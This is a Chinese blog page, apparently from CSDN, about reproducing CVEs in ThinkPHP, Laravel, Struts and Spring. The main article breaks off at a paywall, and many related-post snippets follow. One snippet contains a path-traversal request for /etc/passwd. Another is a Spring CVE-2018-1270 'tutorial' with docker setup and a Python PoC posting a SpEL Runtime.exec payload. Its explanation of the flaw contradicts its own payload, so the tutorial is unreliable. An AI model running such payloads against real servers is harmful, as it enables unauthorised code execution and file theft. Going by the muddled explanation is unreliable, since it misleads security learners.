框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring

原创 已于 2023-07-18 16:23:16 修改 · 620 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#laravel #struts #spring #网络安全 #web安全 #php #java

于 2023-07-16 16:34:39 首次发布

什么是框架?

       就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。

         如果网站的功能是采用框架开发的,那么挖掘功能的漏洞就相当于在挖掘框架自身的漏洞。如果框架产生漏洞也会对使用框架的网站产生影响。

常见语言开发框架:

PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等

JAVA:Spring MyBatis Hibernate Struts2 Springboot等

Python:Django Flask Bottle Turbobars Tornado Web2py等

Javascript:Vue.js Node.js Bootstrap JQuery Angular等

 

如何判断网站是否使用框架

1.使用浏览器插件查看——Wappalyzer

2.查看网站数据包信息

3.查看是否开启某框架的默认端口

最低0.47元/天 解锁文章
漏洞复现CVE-2024-44902 Thinkphp反序列化漏洞
渗透之路,攻防之间皆学问
09-23 5664
Thinkphp v6.1.3至v8.0.4版本中存在反序列化漏洞,攻击者可利用此漏洞执行任意代码。
thinkphp-cve_2018_1002015
m0_49025459的博客
12-06 761
ThinkPHP ThinkPHP(FCS)是一个轻量级的中型框架,是从JavaStruts结构移植过来的中文PHP开发框架。它使用面向对象的开发结构和MVC模式,并且模拟实现了Struts的标签库,各方面都比较人性化,熟悉J2EE的开发人员相对比较容易上手,适合php框架初学者。 ThinkPHP的宗旨是简化开发、提高效率、易于扩展,其在对数据库的支持方面已经包括MySQL、MSSQL、Sqlite、PgSQL、 Oracle,以及PDO的支持。ThinkPHP有着丰富的文档和示例,框架的兼容性较强,但
Thinkphp漏洞复现
weixin_51151498的博客
12-17 1616
Thinkphp漏洞复现
渗透艺术系列之Laravel框架(二)
最新发布
fearhacker的专栏
08-19 990
本文探讨了Laravel框架中的安全漏洞及防御策略。主要分析了服务容器依赖注入陷阱、中间件逻辑绕过、闭包变量逃逸和加密体系漏洞等风险点,如单例模式内存污染、路由缓存注入等。同时提出了九重防护措施:严格校验服务绑定、禁用调试模式闭包反序列化、强制数据库会话驱动等。强调安全本质是攻防博弈,需通过代码审计、红蓝对抗等手段提升防御。核心观点是:提高攻击成本是有效防御策略,当攻击代价超过收益时,攻击者将主动放弃。
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1445
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
网络空间安全学习
10-27 1613
中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,ThinkphpSpring,Flask,jQuery 等1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3、开发框架-Python-django-Flask。
thinkphp 命令执行 (CVE-2018-1002015)
qq_23003811的博客
07-29 529
ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。2、使用蚁剑等工具进行连接/webshell.php。1、访问payload。
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 1049
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
框架漏洞-CVE复现-Apache Shiro+Apache Solr
xiaoheizi的博客
07-19 652
描述:Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。如果网站的功能是采用框架开发的,那么挖掘功能的漏洞就相当于在挖掘框架自身的漏洞。描述:Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理。
框架安全-CVE 复现&Apache Shiro&Apache Solr漏洞复现
网络空间安全学习
11-02 2135
Solr 是一个高性能,采用 Java5 开发。Solr 任意文件读取该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 中间件:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,ThinkphpSpring,Flask,jQuery 等。
Laravel 框架惊现高危漏洞,攻击者可肆意植入恶意脚本
分享web安全、AI安全、云安全、业务安全、渗透测试、安全开发、安全工具、行业动态等优质内容……
03-12 1224
Laravel 框架中出现了一个极为严重的安全漏洞(编号为 CVE-2024-13918)。攻击者能够借此在运行该流行 PHP 框架特定版本的网站上,随意执行 JavaScript 代码。这个漏洞是在 Laravel 调试模式下的错误页面渲染环节被发现的。当应用程序处于开发配置状态时,就容易受到反射性跨站点脚本(XSS)攻击。CVSS v3.1 评分为 8.0 分,受影响的 Laravel 版本为 11.9.0 至 11.35.1。
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
larasploit:Laravel自动漏洞扫描程序
03-18
去做 Laravel指纹 Laravel Leak .env Laravel调试模式 Laravel CVE-2018-15133 Laravel点火 APP_KEY不安全的反序列化已泄漏 安装 克隆回购 git clone https://github.com/carlosevieira/larasploit 跑 cd larasploit python3 larasploit.py
vulfocus靶场thinkphp命令执行cve-2018-1002015
没有故事
04-21 931
漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。thinkPHP 5.0.x版本和5.1.x版本中存在。使用工具: thinkphp综合利用工具,然后使用webshell工具进行连接即可。
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 6195
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
thinkphp3.2.3漏洞_Chrome新版本修复CVE202015999 0 day漏洞
weixin_39692623的博客
12-15 209
10月20日,谷歌发布新版本的Chrome 86.0.4240.111,新版本中共修复了5个安全漏洞,其中一个是0 day 漏洞CVE-2020-15999。Windows、mac和Linux桌面版用户都可以通过设置->帮助-关于Google Chrome 来更新到Chrome 86新版本。CVE-2020-15999 0 day漏洞利用谷歌Project Zero 研究团队发现并...
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 4063
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
漏洞复现-thinkphp-代码执行】vulfocus/thinkphp-cve_2018_1002015
10-14 1831
thinkphp-代码执行】函数
spring-CVE-2018-1270漏洞复现
03-17
### Spring CVE-2018-1270 漏洞复现教程 #### 背景介绍 Spring Framework 是一个广泛使用的 Java 开发框架,提供了丰富的功能来简化企业级应用开发。然而,在某些版本中存在安全漏洞,可能导致远程代码执行 (RCE) 的风险。CVE-2018-1270 就是一个典型的例子,它存在于 `org.springframework.messaging` 包中的 `Http invoker request deserialization` 功能中。 该漏洞允许攻击者通过发送恶意序列化的 HTTP 请求数据包触发 RCE 攻击[^4]。 --- #### 影响范围 此漏洞影响以下版本: - **Spring Framework 5.0 到 5.0.4** - **Spring Framework 4.3 到 4.3.14** 不受影响的修复版本为: - **5.0.x 用户应升级至 5.0.5** - **4.3.x 用户应升级至 4.3.15** --- #### 漏洞原理 当应用程序启用了基于 XML 或 JSON 的反序列化机制时,如果未正确验证输入的数据,则可能被利用来进行任意代码执行。具体来说,`AbstractRemoteInvocationHandler` 类会尝试解析传入的消息并调用目标对象的方法。由于缺乏严格的类型检查,攻击者可以注入恶意 payload 来实现远程命令执行[^3]。 --- #### 复现环境搭建 为了重现此漏洞,通常需要准备如下工具和资源: 1. **Docker 容器**: 使用 vulhub 提供的标准镜像快速部署测试环境。 2. **POC 工具**: 编写或下载可用的 Proof of Concept (PoC) 脚本用于模拟攻击行为。 以下是具体的步骤说明: ##### 步骤一:安装 Docker 和 Compose 确保本地机器上已经安装好 Docker 及其扩展组件 docker-compose。 ##### 步骤二:拉取漏洞演示镜像 运行以下命令获取官方提供的漏洞实验场景: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/spring/CVE-2018-1270/ docker-compose up -d ``` 等待服务启动完成后访问地址确认正常工作状态。 ##### 步骤三:编写 PoC 测试脚本 下面展示了一个简单的 Python 实现方式作为参考案例之一: ```python import requests url = "http://localhost:8080/" payload = { 'exploit': '''T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')''' } try: response = requests.post(url, data=payload) print(response.text) except Exception as e: print(f"Error occurred: {e}") ``` 上述代码片段试图向服务器提交一段能够触碰文件 `/tmp/success` 的指令以证明控制权已被夺取成功与否可通过查看是否存在指定路径下的标记文件得知结果如何。 --- #### 验证效果 一旦完成以上操作流程之后再次登录容器内部检验预期成果是否达成即观察是否有新生成的目标文档出现表明整个过程顺利完成无误: ```bash docker-compose exec spring bash ls /tmp/ # 应能看到 success 文件 ``` --- #### 总结建议 针对此类高危级别的缺陷应当及时采取措施加以防范比如尽快迁移到最新稳定发行版或者关闭不必要的网络接口减少暴露面从而降低遭受潜在威胁的可能性同时也要定期审查第三方依赖库的安全公告以便第一时间响应相应更新通知。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值